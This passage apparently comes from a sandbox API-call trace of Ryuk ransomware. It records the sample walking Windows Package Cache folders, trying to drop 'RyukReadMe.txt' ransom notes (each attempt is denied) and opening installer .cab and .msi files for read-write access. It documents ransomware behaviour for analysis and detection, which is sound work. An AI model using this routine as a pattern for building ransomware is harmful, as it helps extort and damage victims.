Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.821] GetLastError () returned 0x5 [0140.821] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.821] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.821] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.821] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.821] SetLastError (dwErrCode=0x0) [0140.821] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.821] GetLastError () returned 0x5 [0140.821] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.821] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.821] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.821] SetLastError (dwErrCode=0x0) [0140.821] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.822] GetLastError () returned 0x5 [0140.822] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.822] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.822] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.824] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.824] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.824] SetLastError (dwErrCode=0x0) [0140.824] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.824] GetLastError () returned 0x5 [0140.824] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.824] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.824] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.825] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.825] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.825] SetLastError (dwErrCode=0x0) [0140.825] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.825] GetLastError () returned 0x5 [0140.825] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.825] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.825] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.825] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.825] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.825] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.825] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0140.830] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.830] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.830] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.830] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.830] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.831] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.831] SetLastError (dwErrCode=0x0) [0140.831] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.831] GetLastError () returned 0x5 [0140.831] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.831] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.831] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.831] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.831] SetLastError (dwErrCode=0x0) [0140.831] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.831] GetLastError () returned 0x5 [0140.831] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.831] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.831] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.831] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.831] SetLastError (dwErrCode=0x0) [0140.831] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.831] GetLastError () returned 0x5 [0140.831] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.831] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.831] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.831] SetLastError (dwErrCode=0x0) [0140.832] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.832] GetLastError () returned 0x5 [0140.832] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.832] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.832] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.832] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.832] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.832] SetLastError (dwErrCode=0x0) [0140.832] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.832] GetLastError () returned 0x5 [0140.832] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.832] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.832] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.832] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.832] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.832] SetLastError (dwErrCode=0x0) [0140.832] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.833] GetLastError () returned 0x5 [0140.833] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.833] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.833] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.833] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.833] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.833] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.833] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0140.834] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.834] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.834] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.834] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.834] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.834] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x80) returned 0 [0140.834] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.834] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.834] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.834] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.834] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.835] SetLastError (dwErrCode=0x0) [0140.835] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.835] GetLastError () returned 0x5 [0140.835] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.835] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.835] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.835] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.835] SetLastError (dwErrCode=0x0) [0140.835] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.835] GetLastError () returned 0x5 [0140.835] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.835] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.835] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.835] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.835] SetLastError (dwErrCode=0x0) [0140.835] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.835] GetLastError () returned 0x5 [0140.835] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.835] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.835] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.836] SetLastError (dwErrCode=0x0) [0140.836] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.836] GetLastError () returned 0x5 [0140.836] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.836] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.836] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.836] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.836] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.836] SetLastError (dwErrCode=0x0) [0140.836] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.836] GetLastError () returned 0x5 [0140.836] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.836] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.836] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.837] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.837] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.837] SetLastError (dwErrCode=0x0) [0140.837] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.837] GetLastError () returned 0x5 [0140.837] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.837] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.837] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.837] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.837] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.837] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.837] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0140.837] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.837] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.837] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.838] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.838] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.838] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.838] SetLastError (dwErrCode=0x0) [0140.838] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.838] GetLastError () returned 0x5 [0140.838] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.838] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.838] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.838] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.838] SetLastError (dwErrCode=0x0) [0140.838] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.838] GetLastError () returned 0x5 [0140.838] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.838] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.838] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: 